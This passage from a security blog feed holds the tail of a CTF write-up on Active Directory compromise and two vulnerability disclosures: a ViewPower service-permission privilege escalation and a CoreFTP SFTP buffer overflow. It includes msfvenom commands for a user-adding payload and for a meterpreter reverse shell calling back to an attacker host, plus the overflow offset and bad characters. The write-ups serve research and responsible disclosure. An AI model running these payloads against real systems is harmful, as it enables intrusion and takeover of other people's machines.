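The DC’s own replication and the plain attribute read produce no alert; in a real environment the known-DC list also needs the accounts of legitimate replication agents (for example an Azure AD Connect service account), or every sync they perform will alert.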

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/bloodhound.png&quot; alt=&quot;Bloodhound Path&quot; /&gt;&lt;/p&gt;

&lt;p&gt;So we fire up mimikatz/Metasploit/whatever to attack and get all the accounts. However, we don’t get any passwords, just hashes.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/dcsync.png&quot; alt=&quot;Metasploit DCSync&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Now we can choose our approach: pass the hash to the Domain Controller or any other machine, crack the hashes, or even forge a golden ticket to impersonate whoever we want. I won’t go into details since &lt;a href=&quot;https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket&quot;&gt;Hacktricks&lt;/a&gt; made such a great tutorial on how to perform each attack.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/pthDC.png&quot; alt=&quot;Pass The Hash&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After you get the DC flag &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{PwnadosComPao}&lt;/code&gt; you are not done yet :).&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/lastflag.png&quot; alt=&quot;Pass The hash WIN-SHARE&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;all-your-files-belong-to-us&quot;&gt;All Your Files Belong to Us&lt;/h2&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Larapios Group left flags on all machines, tracing back your steps, is something missing?
Own Everything and Everyone!

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Using the administrator credentials you are able to compromise the whole domain. If you go back to the WIN-SHARE machine you will see a new flag  &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;flag{niceFindNeo}&lt;/code&gt; on the root of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;C:\&lt;/code&gt; drive, thus concluding the CTF!&lt;/p&gt;

&lt;p&gt;Essentially the following image shows how someone would do the whole CTF:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/summerchal22/scSol.png&quot; alt=&quot;Pass The hash WIN-SHARE&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;conclusion-and-next-steps&quot;&gt;Conclusion and next steps&lt;/h1&gt;

&lt;p&gt;Although very complete, this scenario was not without troubles. We built the environment with severely limited resources, both RAM and disk. The main problem was updating the images. If you read everything you will notice that we did not exploit any vulnerable software as such; we compromised almost everything through misconfigurations or unwanted leaks found across the machines. When we first provisioned the environment we updated everything as best we could, thinking that we shouldn’t be too far off since it was the newest image on the Microsoft Download Center. Oh boy, were we wrong!&lt;/p&gt;

&lt;p&gt;We were missing roughly a year of updates, and when we went live with the environment one participant exploited the DC directly by abusing the &lt;a href=&quot;https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472&quot;&gt;ZeroLogon&lt;/a&gt; vulnerability and warned us about it. Thank you @comet!&lt;/p&gt;

&lt;p&gt;After a very quick investigation of the logs we noticed that the update service had crashed due to lack of space on the server itself (we only allocated 20GB; in my day that was top of the line… I’m old). We expanded the disk to 25GB and the update was then successful. Live and learn, live and learn. The most annoying thing was that Windows Update reported that “Everything was updated”, which was a blatant lie.&lt;/p&gt;

&lt;p&gt;Luckily we had snapshots of everything… That was our second hurdle. We quickly rolled back to the known-good configuration to expand the disk and update it as fast as we could. However, we had not disabled the rotation of the managed service accounts in our Active Directory, meaning that from time to time, depending on the configuration, some machine accounts rotate their password. This is an automatic process that provides additional security in case a computer account or managed service account key is compromised. However, if we roll back to a base image, it most likely will not have the newer keys and cannot connect back to the domain. There are ways to fix this: rejoining the domain or resetting the Active Directory machine account password on both &lt;a href=&quot;https://activedirectoryfaq.com/2013/11/reset-computer-account-password-in-active-directory/&quot;&gt;ends&lt;/a&gt;. So crisis averted, but something to keep in mind. Important note: I know that at the beginning I said it was important to disable this… I forgot about it.&lt;/p&gt;

&lt;p&gt;This got me thinking: I should invest in a central configuration management tool to automate all configurations in case I need to recover the environment. Perhaps for the next one.&lt;/p&gt;

&lt;p&gt;One thing that was completely missing was the collection of Security Events. We had no SIEM in place and it would be interesting to know what kind of techniques people were using at the moment and understand what improvements we could have made in our scenario.&lt;/p&gt;

&lt;p&gt;We couldn’t do it since we lacked the storage and RAM to run even a Wazuh or Elastic Stack security solution.&lt;/p&gt;

&lt;p&gt;Apart from that, the adventure continues. Thank you for your help in the creation and testing of the challenges @vibrio. Hope to prepare the next one!&lt;/p&gt;
</description>
        <pubDate>Tue, 07 Nov 2023 00:01:00 +0000</pubDate>
        <link>http://www.0x90.zone/ctf/2023/11/07/Oposec-Summer-Challange-Extravaganza.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/ctf/2023/11/07/Oposec-Summer-Challange-Extravaganza.html</guid>
        
        
        <category>CTF</category>
        
      </item>
    
      <item>
        <title>Privilege Escalation on ViewPower - CVE-2021-30490</title>
        <description>&lt;h1 id=&quot;privilege-escalation-on-viewpower---cve-2021-30490&quot;&gt;Privilege Escalation on ViewPower - CVE-2021-30490&lt;/h1&gt;

&lt;p&gt;Lockdown over. Today I am going to present one of the most basic forms of privilege escalation on Windows Systems. This is nothing new.&lt;/p&gt;

&lt;p&gt;ViewPower is software that helps you manage your UPS. It allows one to view the state of the battery and control some of the most basic functions. It is recommended by some UPS manufacturers such as Phasak. Unfortunately, it didn’t work for my model, so I decided to investigate how it was configured.&lt;/p&gt;

&lt;h2 id=&quot;a-bit-about-windows-permissions&quot;&gt;A bit about Windows permissions&lt;/h2&gt;

&lt;p&gt;Similar to Linux, Windows offers a set of permissions on objects. These permissions can be applied to several instances, for example, the well-known files, registry keys, Active Directory Objects, …&lt;/p&gt;

&lt;p&gt;Permissions follow the Discretionary Access Control List (DACL) principle. More can be found at https://docs.microsoft.com/en-us/windows/win32/secauthz/dacls-and-aces.&lt;/p&gt;

&lt;p&gt;The DACL is composed of one or more Access Control Entries (ACEs). Each entry states whether a given principal can or cannot access the resource.&lt;/p&gt;

&lt;p&gt;Sometimes the effective permissions on a resource need to be calculated (https://networkencyclopedia.com/effective-permissions). This happens, for example, when a large group is granted access but you want to restrict one user in particular.&lt;/p&gt;

&lt;p&gt;In Windows, permissions are not limited to Read, Write, or Execute. There are several special permissions that, under certain conditions, can yield the same or similar effects (https://docs.microsoft.com/en-us/archive/msdn-magazine/2008/november/access-control-understanding-windows-file-and-registry-permissions).&lt;/p&gt;

&lt;p&gt;These permissions make it possible to grant access to users granularly. However, some administrators just blatantly use the &lt;strong&gt;Full Control&lt;/strong&gt; permission set (you can’t have privilege escalation if you are already an administrator 😎).&lt;/p&gt;

&lt;p&gt;Each entry needs a &lt;strong&gt;security principal&lt;/strong&gt;. This is often a user, group, service account, or a “Special User”. For instance, the principal &lt;strong&gt;Everyone&lt;/strong&gt; is exactly what the name implies: every user, authenticated or unauthenticated, so anyone can access the resource. The principal &lt;strong&gt;Guest&lt;/strong&gt; is the guest user. The principal &lt;strong&gt;NT Authority/Authenticated Users&lt;/strong&gt; refers to all authenticated users, which means no guests.&lt;/p&gt;

&lt;p&gt;Often you see &lt;strong&gt;Everyone&lt;/strong&gt; used on shares so anyone can access them, instead of &lt;strong&gt;Domain Users&lt;/strong&gt;, the group where every user of the Active Directory domain resides.&lt;/p&gt;

&lt;p&gt;When nothing works, a lousy system administrator tends to grant all the permissions and, since it then works, nobody touches it again; otherwise, people get mad.&lt;/p&gt;

&lt;p&gt;Lastly, you need to Allow or Deny the permission.&lt;/p&gt;

&lt;p&gt;In essence, this is what it takes to create an ACE.&lt;/p&gt;

&lt;h2 id=&quot;exploiting-it-cve-2021-30490&quot;&gt;Exploiting it (CVE-2021-30490)&lt;/h2&gt;

&lt;p&gt;Since a program has to install files in order to work, permissions need to be set on them. The &lt;strong&gt;ViewPower&lt;/strong&gt; application runs as a service. It starts with the computer and runs in the background monitoring your UPS.&lt;/p&gt;

&lt;p&gt;In Windows, a service typically runs with a high level of privilege such as &lt;strong&gt;NT Authority/System&lt;/strong&gt;. It can later drop its privileges to a lower level… but who has the time, right? Services often never change this configuration.&lt;/p&gt;

&lt;p&gt;A service usually points to an entry point: a file to be executed. Since that file is going to be run as the service, with the highest privileges (usually), it is paramount that nothing with low-privilege access can tamper with it.&lt;/p&gt;

&lt;p&gt;This is exactly what is present in this demonstration. I said nothing new was going to be learnt today and I stand by it. One of the simplest Windows privilege escalations is to look at all the services running on the machine and check whether any of the executed files have loose permissions that might allow a user to escalate to &lt;strong&gt;NT Authority/System&lt;/strong&gt;, since the service runs with that account.&lt;/p&gt;

&lt;p&gt;You can do this by looking at the file location in the service list and using the &lt;strong&gt;icacls&lt;/strong&gt; command:&lt;/p&gt;

&lt;p&gt;Open the Run dialog and type &lt;strong&gt;services.msc&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/viewpower/runservices.png&quot; alt=&quot;RunServices&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Now search for the service you want to inspect and double click on it. In our case, it is called &lt;strong&gt;upsMonitor&lt;/strong&gt; or &lt;strong&gt;upsProMonitor&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/viewpower/serviceupsPro.png&quot; alt=&quot;ServiceUPS&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Locate the &lt;strong&gt;Path to Executable&lt;/strong&gt; and copy it. Now open a &lt;strong&gt;PowerShell&lt;/strong&gt; or &lt;strong&gt;Command Prompt&lt;/strong&gt; and pass it to the &lt;strong&gt;icacls&lt;/strong&gt; command.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/viewpower/icaclsPro.png&quot; alt=&quot;ServiceICACLS&quot; /&gt;&lt;/p&gt;

&lt;p&gt;You can see four entries. The first three are quite standard. The last one grants Modify access to &lt;strong&gt;NT Authority/Authenticated Users&lt;/strong&gt;. This means that any authenticated user can modify the binary, so in theory we can replace the file with our own code, for instance a reverse shell or a privileged command.&lt;/p&gt;

&lt;p&gt;You can also use the PowerView PowerShell script to automate this task (don’t confuse it with the software at hand) using the &lt;strong&gt;Get-ModifiableServiceFile&lt;/strong&gt; call (https://powersploit.readthedocs.io/en/latest/Privesc/Get-ModifiableServiceFile/).&lt;/p&gt;
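&lt;p&gt;The check above can also be scripted. The following is an added example (it is not the author’s code and not part of ViewPower or PowerView): it parses &lt;strong&gt;icacls&lt;/strong&gt; output for a service binary and flags any ACE that grants a broad principal (Everyone, Authenticated Users, Users, INTERACTIVE) a right that allows changing the file or its ACL. The install path &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;C:\Program Files\ViewPower\upsMonitorPro.exe&lt;/code&gt; and the sample icacls output are constructed for the example; on a real host the path is the service’s Path to Executable.&lt;/p&gt;

```python
import re
import subprocess

# icacls right codes that let a principal change the file's contents or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DE", "WDAC", "WO"}

# Principals that every local user, or every logged-on user, belongs to.
BROAD_PRINCIPALS = {
    "everyone",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
    "builtin\\users",
}

# One ACE line, "PRINCIPAL:(flag)(flag)...", once the leading path is removed.
ACE_RE = re.compile(r"^(.*?):((?:\([A-Za-z,]*\))+)$")


def parse_icacls(output, path):
    """Return [(principal, [flags...]), ...] from icacls output for `path`.

    icacls prints the path once, in front of the first ACE; the other ACEs are
    indented under it, and a summary line follows.
    """
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        match = ACE_RE.match(line)
        if match is None:
            continue  # blank line or the "Successfully processed ..." summary
        principal = match.group(1).strip()
        flags = re.findall(r"\(([^)]*)\)", match.group(2))
        entries.append((principal, flags))
    return entries


def weak_aces(entries):
    """ACEs giving a broad principal a right from WRITE_RIGHTS (Deny ACEs skipped)."""
    findings = []
    for principal, flags in entries:
        if "DENY" in flags or principal.lower() not in BROAD_PRINCIPALS:
            continue
        granted = set()
        for flag in flags:
            for right in flag.split(","):
                granted.add(right.strip())
        hits = sorted(granted.intersection(WRITE_RIGHTS))
        if hits:
            findings.append((principal, hits))
    return findings


def audit_binary(path):
    """Run icacls on a live Windows host and return the weak ACEs for `path`."""
    result = subprocess.run(["icacls", path], capture_output=True, text=True)
    return weak_aces(parse_icacls(result.stdout, path))


# Constructed sample: the install path is an assumption, and the output mimics
# icacls for the case in the article (Authenticated Users with Modify rights).
SERVICE_EXE = r"C:\Program Files\ViewPower\upsMonitorPro.exe"
SAMPLE_ICACLS_OUTPUT = (
    SERVICE_EXE + " NT AUTHORITY\\SYSTEM:(I)(F)\n"
    "                     BUILTIN\\Administrators:(I)(F)\n"
    "                     BUILTIN\\Users:(I)(RX)\n"
    "                     NT AUTHORITY\\Authenticated Users:(I)(M)\n"
    "\n"
    "Successfully processed 1 files; Failed processing 0 files\n"
)


def sample_findings():
    """Weak ACEs found in the constructed sample above."""
    return weak_aces(parse_icacls(SAMPLE_ICACLS_OUTPUT, SERVICE_EXE))


if __name__ == "__main__":
    for principal, rights in sample_findings():
        print("WEAK: %s has %s on %s" % (principal, ",".join(rights), SERVICE_EXE))
```

&lt;p&gt;Run over every service’s Path to Executable, this gives the same result as the manual icacls inspection, and an empty list is the expected state: only SYSTEM and Administrators should be able to write a service binary. The fix on an affected install is to strip the offending ACE (icacls with its /remove option on that principal) rather than to add a Deny entry on top of it.&lt;/p&gt;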

&lt;p&gt;For instance, you can wrap the command &lt;strong&gt;net group “Administrators” &amp;lt;current username&amp;gt;&lt;/strong&gt; in an executable file, and the user is magically an Administrator.&lt;/p&gt;

&lt;p&gt;There are two downsides:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;You need to restart the service for it to take effect. Nothing that a reboot can’t handle, if you have a local session on the computer.&lt;/li&gt;
  &lt;li&gt;The file cannot be in use while you replace it; on some occasions you can kill the process. I believe this was done to give a standard user access to control the application.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can use &lt;strong&gt;msfvenom&lt;/strong&gt; to create an executable file with the command to be executed, for instance:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;msfvenom -a x86 --platform Windows -p windows/exec CMD=&quot;net user johnny john /add&quot; -f exe &amp;gt; upsMonitorPro.exe&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/viewpower/kaliGeneratePayload.png&quot; alt=&quot;ServiceICACLS&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After copying it to the destination folder, you can restart the service or reboot the computer for the change to take effect.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/viewpower/copyPayload.png&quot; alt=&quot;CopyPayload&quot; /&gt;&lt;/p&gt;

&lt;p&gt;If you restart the service you will get an error message stating that the service was not able to initialize. This is because we just created an executable file that exited, but the code was run!&lt;/p&gt;

&lt;p&gt;If you go to &lt;strong&gt;Computer Management-&amp;gt;Users&lt;/strong&gt; you will notice the newly created account. We can add ourselves to the Administrators group or perform any other action we want. The sky is the limit now.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/viewpower/newAccountCreated.png&quot; alt=&quot;ServiceICACLS&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Both the ViewPower standard and the Pro version are affected by this vulnerability. The professional version adds more services that suffer from this such as:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;upsProMonitor&lt;/li&gt;
  &lt;li&gt;upsProMySQL&lt;/li&gt;
  &lt;li&gt;upsProTomcat&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You just need to pick one and exploit it to escalate privileges.&lt;/p&gt;

&lt;p&gt;A refinement of these permissions should be done to mitigate and/or fix the issue; however, standard installations are vulnerable to this.&lt;/p&gt;

&lt;p&gt;Note that all this was done as an unprivileged user.&lt;/p&gt;

&lt;h2 id=&quot;impact&quot;&gt;Impact&lt;/h2&gt;

&lt;p&gt;This vulnerability allows for an unprivileged user to escalate privileges and gain an &lt;strong&gt;Administrator&lt;/strong&gt; or &lt;strong&gt;NT Authority/System&lt;/strong&gt; set of rights. Exploitation is trivial.&lt;/p&gt;

&lt;h2 id=&quot;disclosure&quot;&gt;Disclosure&lt;/h2&gt;

&lt;p&gt;This vulnerability follows the responsible disclosure standard, as usual.&lt;/p&gt;

&lt;p&gt;Affected software: &lt;strong&gt;ViewPower&lt;/strong&gt; and &lt;strong&gt;ViewPowerPro&lt;/strong&gt; versions &lt;strong&gt;V1.04-21012&lt;/strong&gt; (other versions might be vulnerable)&lt;/p&gt;

&lt;p&gt;Download Link (This version was removed from the Website):&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/files/ViewPowerV1.04-21012/installViewPowerPro_Windows.zip&quot;&gt;ViewPower Pro - V1.04-21012&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/files/ViewPowerV1.04-21012/installViewPowerHTML%20Windows.zip&quot;&gt;ViewPower - V1.04-21012&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/files/ViewPowerV1.04-21012/installViewPowerHTML%20Windows_XP_2003_2008.zip&quot;&gt;ViewPower (Windows XP) - V1.04-21012&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;“Official” website (others might exist, but this was the one tested): &lt;a href=&quot;https://www.power-software-download.com/viewpower.html&quot;&gt;https://www.power-software-download.com/viewpower.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Tested on:&lt;/p&gt;

&lt;p&gt;Windows 10 Version 20H2 OS Build 19042.928&lt;/p&gt;

&lt;h2 id=&quot;final-note&quot;&gt;Final note&lt;/h2&gt;

&lt;p&gt;At the time of disclosure, I rechecked whether the new version available on the official website was fixed. It is not. The problem remains on the latest Windows 10 installation (although this has nothing to do with the software problem) and on the latest available version (from 15/08/2022), &lt;strong&gt;V1.04-21353&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The new version is also available as a mirror &lt;a href=&quot;/files/ViewPowerV1.04-21353/ViewPower1.04-21353.zip&quot;&gt;here&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/viewpower/updatedVersion2022.png&quot; alt=&quot;ServiceICACLS&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;timeline&quot;&gt;Timeline&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;11/04/2021 - Vulnerability discovery, CVE-2021-30490&lt;/li&gt;
  &lt;li&gt;26/09/2021 - Couldn’t possibly find a manufacturer, so I contacted a bunch of implementers. There was no email on the official page.&lt;/li&gt;
  &lt;li&gt;27/09/2021 - Details to implementers sent&lt;/li&gt;
  &lt;li&gt;27/10/2021 - Status request&lt;/li&gt;
  &lt;li&gt;03/11/2021 - Still pending&lt;/li&gt;
  &lt;li&gt;15/08/2022 - Disclosing it&lt;/li&gt;
&lt;/ul&gt;

</description>
        <pubDate>Sun, 16 Aug 2020 00:01:00 +0000</pubDate>
        <link>http://www.0x90.zone/binary/reverse/exploitation/2020/08/16/Privilege-Escalation-ViewPower.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/binary/reverse/exploitation/2020/08/16/Privilege-Escalation-ViewPower.html</guid>
        
        
        <category>binary</category>
        
        <category>reverse</category>
        
        <category>exploitation</category>
        
      </item>
    
      <item>
        <title>Unauthenticated Remote Code Execution/DoS on CoreFTP Server - CVE-2020-19596/CVE-2020-19595</title>
        <description>&lt;h1 id=&quot;unauthenticated-remote-code-executiondos-on-coreftp-server---cve-2020-19596cve-2020-19595&quot;&gt;Unauthenticated Remote Code Execution/DoS on CoreFTP Server - CVE-2020-19596/CVE-2020-19595&lt;/h1&gt;

&lt;p&gt;Well hello there, hope everyone is doing well on this lockdown. As with many people, I started learning some new tricks, and I went old school on this one. With the excess time we had to play with, I started looking again at old-school exploits such as buffer overflows. Well, it didn’t take long to find one.&lt;/p&gt;

&lt;p&gt;CoreFTP comes in two versions: a client and a server. Let us focus on the server side. CoreFTP Server is an FTP server (shocking) that allows IT administrators not only to serve FTP but also SFTP with client certificates, and to integrate with the domain. For the sake of clarity, we tested Core FTP build 583.&lt;/p&gt;

&lt;h2 id=&quot;starting-testing&quot;&gt;Starting testing&lt;/h2&gt;

&lt;p&gt;As with every test, we start by sending some erroneous data to every user input field possible. There were a lot of crashes in the Server Management GUI. For instance, on the self-signed server certificate fields, we could overwrite the EIP pretty quickly, but the problem would be non-ASCII characters, and it would be pointless anyway, since you already have access to the management interface, which supposedly operates in administrative mode because the server needs to bind to low ports (0-1023).&lt;/p&gt;

&lt;p&gt;However, this opens the door to exploiting other fields. The server exposes a network port to allow clients to connect and retrieve data. I chose to go with SFTP (basically SSH, only with file support) with SSH keys enabled. The first idea was to send garbage data in the key-exchange phase of the protocol, for instance an overly long encoded message, to trigger the bug. However, clients verify that the data is valid before sending it. Next, I just tried a simple username of ‘A’*huge_amount, and the server stopped responding and hung. Hmmm..&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/coreftprce/image4.png&quot; alt=&quot;crashServer&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I quickly created an environment with the service running on a Windows XP SP3 Build 2600 machine (because, no protections) and another on a Windows 10 machine. For the sake of clarity, &lt;strong&gt;my victim machine will be at 192.168.155.132&lt;/strong&gt;, and the &lt;strong&gt;attacker’s machine will be at 192.168.155.176&lt;/strong&gt;. I quickly checked the binary and verified that it doesn’t have any security extensions; this means no ASLR, no DEP, nothing. Thus we don’t need to worry about bypassing these technologies. I followed the training &lt;a href=&quot;https://www.fuzzysecurity.com/tutorials.html&quot;&gt;here&lt;/a&gt; (and I recommend it). I attached a debugger (ImmunityDBG) to the process, generated an SSH key pair (it doesn’t matter, as we are going to find out) and used it to connect to the server, but with ‘A’*1024 as the username, and we get the glorious EIP 41414141. Hurray! We control the EIP and have a primary entry point to try to exploit this!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/coreftprce/image5.png&quot; alt=&quot;debuggerattached&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;exploiting-it-cve-2020-19596&quot;&gt;Exploiting it (CVE-2020-19596)&lt;/h2&gt;

&lt;p&gt;If you read the tutorial link (and I think you should if it’s the first time you are reading something like this), you should know that the next step is to determine the offset at which the EIP is overwritten. You can either do it by trial and error or be smart and use something like the pattern generator tool from the Metasploit framework. With that, we can see that the EIP will be overwritten after &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;198 bytes&lt;/code&gt;, which means that we need to write 198 bytes of padding before the value that overwrites it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/coreftprce/image1.png&quot; alt=&quot;monafindoffset&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After that, find any instruction capable of jumping to our shellcode, such as a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;call ESP&lt;/code&gt;. We can use the &lt;a href=&quot;https://github.com/corelan/mona&quot;&gt;mona script&lt;/a&gt; to help enumerate all the possibilities. It will search for all compatible instructions in all the code and imported modules. Since the main module’s addresses contain a NULL byte, we cannot choose it, so we need to rely on imported DLLs. Since Windows XP has a lot of them without ASLR, we can pick one that suits us. However, it means that the exploit needs to be ported for other operating systems, service packs, maybe language, etc.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/coreftprce/image6.png&quot; alt=&quot;monajumptoshellcode&quot; /&gt;&lt;/p&gt;

&lt;p&gt;In the previous image, we can see some of the possible &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;JUMP ESP&lt;/code&gt; instructions, but there are many more listed in a text file in your workspace:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/coreftprce/image7.png&quot; alt=&quot;monajumptoshellcode2&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Next, we should move along and perform a bad-chars evaluation. When we send the characters to the buffer, some of them may break the normal functioning of the exploit (due to checks or operations on them). We can use the mona script to generate an array of all possible values, from 0x00 to 0xFF, or 0 to 255. Sending this buffer and analysing the memory afterwards gets us the bad chars. The mona script can compare the chars sent with what landed in memory and give a direct answer on what we should exclude from the payload.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/coreftprce/image8.png&quot; alt=&quot;monadetectbadchars&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The payload can then be crafted using msfvenom from Metasploit, passing the bad chars (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;\x00 \x01 \x02 \x0a \x0d \x40&lt;/code&gt;) with the ‘-b’ flag. We generate a small payload to get remote code execution:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.155.176 LPORT=443 -b &apos;\x00\x01\x02\x0a\x0d\x40&apos; -f python --smallest&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;In this case, I used a meterpreter payload just because, but you can choose whatever you want. I just opened a listener on the Metasploit console and ran the following exploit.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/coreftprce/image9.png&quot; alt=&quot;exploitcode&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Yes, I pasted an image with the code because it could trigger antivirus agents, since it has a very rudimentary Meterpreter shell in it. The exploit uses the &lt;a href=&quot;http://www.paramiko.org/&quot;&gt;paramiko SSH library&lt;/a&gt; to connect to the SSH service and pass the payload as the username. The connection will fail, but at that point, we should get our shell in Metasploit. One small detail: if we use the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;CALL ESP&lt;/code&gt;, the exploit will succeed and the service will continue to run as intended, at least in this case. Hurray, we got unauthenticated RCE! =). Some additional remarks are in order: once you get RCE and can access the file system, try to access the configuration file. There you will find several hashes encrypted with AES256; someone did a great reversing job and posted the procedure to decrypt them &lt;a href=&quot;https://coreysalzano.com/how-to/how-to-extract-passwords-from-core-ftp-le/&quot;&gt;here&lt;/a&gt;. You can also look for specific memory locations of the decrypted hashes (I sure did, but later found out about this; at least I learned something in the process). Then you can hopefully use that credential to maintain access. The application needs to run in Administrator mode, so you just got at least Local Administrator on a machine, congratz!&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/coreftprce/image10.png&quot; alt=&quot;exploitcode&quot; /&gt;&lt;/p&gt;

&lt;p&gt;There are also other versions vulnerable to this, but after version 2.1 of the CoreFTP Server, the buffer started being converted to UTF-8, and we would need to use the &lt;a href=&quot;https://img2.helpnetsecurity.com/dl/articles/unicodebo.pdf&quot;&gt;Venetian method&lt;/a&gt; to exploit it. I was not successful in doing that, so what we are left with is Denial of Service (DoS, CVE-2020-19595). To do this, we send garbage to the buffer and crash the service. Meh, not that good, but it could be helpful in some situations. Maybe someone who knows more than I do can help and exploit this.&lt;/p&gt;

&lt;p&gt;There is the problem of the portability of the exploit. I did this on a Windows XP SP3 machine (except the detection of security extensions, which I did on the Windows 10 machine) so I wouldn’t be bothered with ASLR and DEP. Since the program’s own code addresses hold bad chars, such as the NULL byte (0x00), we can’t use it to borrow an instruction to jump to our shellcode; otherwise, the exploit would work on all OSs. Therefore we needed to use one of the imported DLLs to reuse the instruction and then jump to our shellcode. One interesting thing to work on is to try to craft something that would bypass the authentication, skip the verification of the password and give access to files. I don’t know if it is possible, but I wonder. Also, this exploit &lt;strong&gt;only works if SSH key authentication is enabled&lt;/strong&gt;. You don’t need a user registered with a key, but the server should accept it. The problem lies in the most robust configuration (using SSH keys to authenticate users), even if no key is configured.&lt;/p&gt;

&lt;h2 id=&quot;disclosure&quot;&gt;Disclosure&lt;/h2&gt;

&lt;p&gt;This vulnerability follows the responsible disclosure standard. At first, the vendor did not reply, but after insisting I got through to someone who could patch this. After investigation, he provided the patch to clients, and after the patch had been available for one month, I released this disclosure. I would like to thank them for providing support in fixing this vulnerability. As a footnote, I am still waiting for the CVE ID from MITRE; when that’s available, I’ll update this page.&lt;/p&gt;

&lt;h2 id=&quot;timeline&quot;&gt;Timeline&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;01/05/2020 - Vulnerability discovery&lt;/li&gt;
  &lt;li&gt;02/06/2020 - First contact with vendor&lt;/li&gt;
  &lt;li&gt;21/06/2020 - Second contact with vendor&lt;/li&gt;
  &lt;li&gt;26/06/2020 - Vulnerability fix tested, patch confirmed&lt;/li&gt;
  &lt;li&gt;27/07/2020 - Official date of release&lt;/li&gt;
  &lt;li&gt;16/08/2020 - Real date of release&lt;/li&gt;
  &lt;li&gt;23/08/2020 - Grammar fixes, thanks to @jpdias =)&lt;/li&gt;
  &lt;li&gt;04/04/2020 - Added CVE-2020-19596 and CVE-2020-19595&lt;/li&gt;
&lt;/ul&gt;

</description>
        <pubDate>Sun, 16 Aug 2020 00:01:00 +0000</pubDate>
        <link>http://www.0x90.zone/binary/reverse/exploitation/2020/08/16/CoreFTPServerRCE.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/binary/reverse/exploitation/2020/08/16/CoreFTPServerRCE.html</guid>
        
        
        <category>binary</category>
        
        <category>reverse</category>
        
        <category>exploitation</category>
        
      </item>
    
      <item>
